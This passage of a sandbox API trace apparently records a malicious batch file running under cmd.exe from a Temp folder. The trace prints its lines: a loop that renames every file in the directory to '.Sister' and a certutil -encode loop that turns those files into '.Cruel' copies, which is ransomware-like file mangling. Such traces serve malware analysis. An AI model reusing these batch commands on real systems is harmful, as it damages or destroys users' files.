hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x6e16f135, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0xb1ff7ba5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xb1ff7ba5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="System Volume Information", cAlternateFileName="")) returned 1 [0100.731] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="Users", cAlternateFileName="")) returned 1 [0100.731] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="Windows", cAlternateFileName="")) returned 1 [0100.731] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="Windows10Upgrade", cAlternateFileName="")) returned 1 [0100.731] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="Windows10Upgrade", cAlternateFileName="")) returned 0 [0100.731] FindClose (in: hFindFile=0x21ed8c7d160 | out: hFindFile=0x21ed8c7d160) returned 1 [0100.731] GetLastError () returned 0x12 [0100.731] GetProcessHeap () returned 0x21ed8c70000 [0100.731] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cd20) returned 1 [0100.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.731] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0100.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.739] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0100.788] _get_osfhandle (_FileHandle=0) returned 0x4c [0100.788] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0100.791] SetConsoleInputExeNameW () returned 0x1 [0100.791] GetConsoleOutputCP () returned 0x1b5 [0100.792] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0100.792] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.796] ??_V@YAXPEAX@Z () returned 0x1 [0100.796] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0100.796] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0100.797] _get_osfhandle (_FileHandle=3) returned 0x3c [0100.797] SetFilePointer (in: hFile=0x3c, lDistanceToMove=131, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x83 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7d000) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7d0e0) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b3a0) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c8f0) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bf30) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b300) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c5f0) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c530) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c500) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c72900) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c440) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c380) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c77830) returned 1 [0100.797] GetProcessHeap () returned 0x21ed8c70000 [0100.797] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b100) returned 1 [0100.798] GetProcessHeap () returned 0x21ed8c70000 [0100.798] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c72840) returned 1 [0100.798] GetProcessHeap () returned 0x21ed8c70000 [0100.798] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b340) returned 1 [0100.798] GetProcessHeap () returned 0x21ed8c70000 [0100.798] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c774f0) returned 1 [0100.798] GetProcessHeap () returned 0x21ed8c70000 [0100.798] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c727e0) returned 1 [0100.798] GetProcessHeap () returned 0x21ed8c70000 [0100.798] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c72720) returned 1 [0100.798] _get_osfhandle (_FileHandle=3) returned 0x3c [0100.798] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x83 [0100.798] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x47a, lpOverlapped=0x0) returned 1 [0100.798] SetFilePointer (in: hFile=0x3c, lDistanceToMove=133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0100.798] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\nr %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0100.798] _get_osfhandle (_FileHandle=3) returned 0x3c [0100.798] GetFileType (hFile=0x3c) returned 0x1 [0100.798] _get_osfhandle (_FileHandle=3) returned 0x3c [0100.798] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0100.798] GetProcessHeap () returned 0x21ed8c70000 [0100.798] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c96f40 [0100.798] GetProcessHeap () returned 0x21ed8c70000 [0100.798] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96f40) returned 1 [0100.799] _tell (_FileHandle=3) returned 133 [0100.799] _close (_FileHandle=3) returned 0 [0100.799] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0100.799] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0100.799] _get_osfhandle (_FileHandle=3) returned 0x3c [0100.799] SetFilePointer (in: hFile=0x3c, lDistanceToMove=133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0100.800] _get_osfhandle (_FileHandle=3) returned 0x3c [0100.800] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0100.800] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x478, lpOverlapped=0x0) returned 1 [0100.800] SetFilePointer (in: hFile=0x3c, lDistanceToMove=197, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc5 [0100.800] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=64, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="for %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 64 [0100.800] _get_osfhandle (_FileHandle=3) returned 0x3c [0100.800] GetFileType (hFile=0x3c) returned 0x1 [0100.800] _get_osfhandle (_FileHandle=3) returned 0x3c [0100.800] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc5 [0100.800] GetProcessHeap () returned 0x21ed8c70000 [0100.800] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c96f40 [0100.801] GetProcessHeap () returned 0x21ed8c70000 [0100.801] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96f40) returned 1 [0100.801] _wcsicmp (_String1="for", _String2=")") returned 61 [0100.801] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0100.801] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0100.801] GetProcessHeap () returned 0x21ed8c70000 [0100.801] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96400 [0100.801] GetProcessHeap () returned 0x21ed8c70000 [0100.801] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7ce80 [0100.801] GetProcessHeap () returned 0x21ed8c70000 [0100.801] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8c774f0 [0100.801] GetProcessHeap () returned 0x21ed8c70000 [0100.801] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c774f0, Size=0x18) returned 0x21ed8c774f0 [0100.801] GetProcessHeap () returned 0x21ed8c70000 [0100.801] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c774f0) returned 0x18 [0100.801] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0100.801] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0100.801] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0100.801] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0100.801] _wcsicmp (_String1="IN", _String2="in") returned 0 [0100.802] GetProcessHeap () returned 0x21ed8c70000 [0100.802] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8c77830 [0100.802] _wcsicmp (_String1="DO", _String2="do") returned 0 [0100.802] _wcsicmp (_String1="certutil", _String2=")") returned 58 [0100.802] _wcsicmp (_String1="FOR", _String2="certutil") returned 3 [0100.802] _wcsicmp (_String1="FOR/?", _String2="certutil") returned 3 [0100.802] _wcsicmp (_String1="IF", _String2="certutil") returned 6 [0100.802] _wcsicmp (_String1="IF/?", _String2="certutil") returned 6 [0100.802] _wcsicmp (_String1="REM", _String2="certutil") returned 15 [0100.802] _wcsicmp (_String1="REM/?", _String2="certutil") returned 15 [0100.802] GetProcessHeap () returned 0x21ed8c70000 [0100.802] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96040 [0100.802] GetProcessHeap () returned 0x21ed8c70000 [0100.802] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8c7c8f0 [0100.802] GetProcessHeap () returned 0x21ed8c70000 [0100.802] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7c070 [0100.803] _tell (_FileHandle=3) returned 197 [0100.803] _close (_FileHandle=3) returned 0 [0100.803] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0100.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.803] GetFileType (hFile=0x50) returned 0x2 [0100.803] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0100.803] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0100.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.805] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0100.819] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\") returned 0x3 [0100.819] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\") returned 3 [0100.820] _vsnwprintf (in: _Buffer=0x21ed8e80166, _BufferCount=0x83e2, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0100.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.820] GetFileType (hFile=0x50) returned 0x2 [0100.820] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0100.820] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0101.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0101.084] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x4) returned 1 [0101.293] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fea18 | out: _Buffer="for") returned 3 [0101.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0101.293] GetFileType (hFile=0x50) returned 0x2 [0101.294] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0101.294] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0101.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0101.407] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x3) returned 1 [0101.587] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" %a in ") returned 7 [0101.587] _get_osfhandle (_FileHandle=1) returned 0x50 [0101.587] GetFileType (hFile=0x50) returned 0x2 [0101.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0101.587] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0101.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0101.752] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0101.867] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fea18 | out: _Buffer="(*.Sister) do ") returned 14 [0101.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0101.867] GetFileType (hFile=0x50) returned 0x2 [0101.867] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0101.867] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0101.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0101.963] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0xe) returned 1 [0102.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0102.278] GetFileType (hFile=0x50) returned 0x2 [0102.278] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0102.278] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0102.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0102.378] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c7c900*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x21ed8c7c900*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x8) returned 1 [0102.573] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" -encode \"%~a\" \"%~na.Cruel\" ") returned 28 [0102.573] _get_osfhandle (_FileHandle=1) returned 0x50 [0102.573] GetFileType (hFile=0x50) returned 0x2 [0102.573] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0102.573] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0102.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0102.672] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x1c) returned 1 [0102.751] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0102.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0102.751] GetFileType (hFile=0x50) returned 0x2 [0102.751] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0102.751] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0102.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0102.865] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0102.941] malloc (_Size=0xffce) returned 0x21ed8e90940 [0102.941] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0102.941] GetProcessHeap () returned 0x21ed8c70000 [0102.941] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cee0 [0102.941] GetProcessHeap () returned 0x21ed8c70000 [0102.941] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c7b300 [0102.941] GetProcessHeap () returned 0x21ed8c70000 [0102.941] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c7b340 [0102.941] GetProcessHeap () returned 0x21ed8c70000 [0102.941] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8c7d160 [0102.941] GetProcessHeap () returned 0x21ed8c70000 [0102.941] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d160, Size=0x24) returned 0x21ed8c7d160 [0102.941] GetProcessHeap () returned 0x21ed8c70000 [0102.941] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d160) returned 0x24 [0102.942] GetProcessHeap () returned 0x21ed8c70000 [0102.942] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8c7c920 [0102.942] FindFirstFileExW (in: lpFileName="*.Sister", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fe640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fe640) returned 0xffffffffffffffff [0102.943] GetLastError () returned 0x2 [0102.943] GetProcessHeap () returned 0x21ed8c70000 [0102.943] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c920) returned 1 [0102.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0102.943] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0103.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0103.021] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0103.104] _get_osfhandle (_FileHandle=0) returned 0x4c [0103.104] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0103.179] SetConsoleInputExeNameW () returned 0x1 [0103.179] GetConsoleOutputCP () returned 0x1b5 [0103.261] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0103.261] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.359] ??_V@YAXPEAX@Z () returned 0x1 [0103.359] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0103.360] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0103.360] _get_osfhandle (_FileHandle=3) returned 0x3c [0103.360] SetFilePointer (in: hFile=0x3c, lDistanceToMove=197, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc5 [0103.360] GetProcessHeap () returned 0x21ed8c70000 [0103.360] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7d160) returned 1 [0103.360] GetProcessHeap () returned 0x21ed8c70000 [0103.360] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b340) returned 1 [0103.360] GetProcessHeap () returned 0x21ed8c70000 [0103.360] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b300) returned 1 [0103.360] GetProcessHeap () returned 0x21ed8c70000 [0103.360] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cee0) returned 1 [0103.360] GetProcessHeap () returned 0x21ed8c70000 [0103.360] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c070) returned 1 [0103.360] GetProcessHeap () returned 0x21ed8c70000 [0103.360] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c8f0) returned 1 [0103.360] GetProcessHeap () returned 0x21ed8c70000 [0103.360] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96040) returned 1 [0103.360] GetProcessHeap () returned 0x21ed8c70000 [0103.360] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c77830) returned 1 [0103.360] GetProcessHeap () returned 0x21ed8c70000 [0103.360] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c774f0) returned 1 [0103.360] GetProcessHeap () returned 0x21ed8c70000 [0103.360] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ce80) returned 1 [0103.360] GetProcessHeap () returned 0x21ed8c70000 [0103.360] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96400) returned 1 [0103.361] _get_osfhandle (_FileHandle=3) returned 0x3c [0103.361] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc5 [0103.361] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, 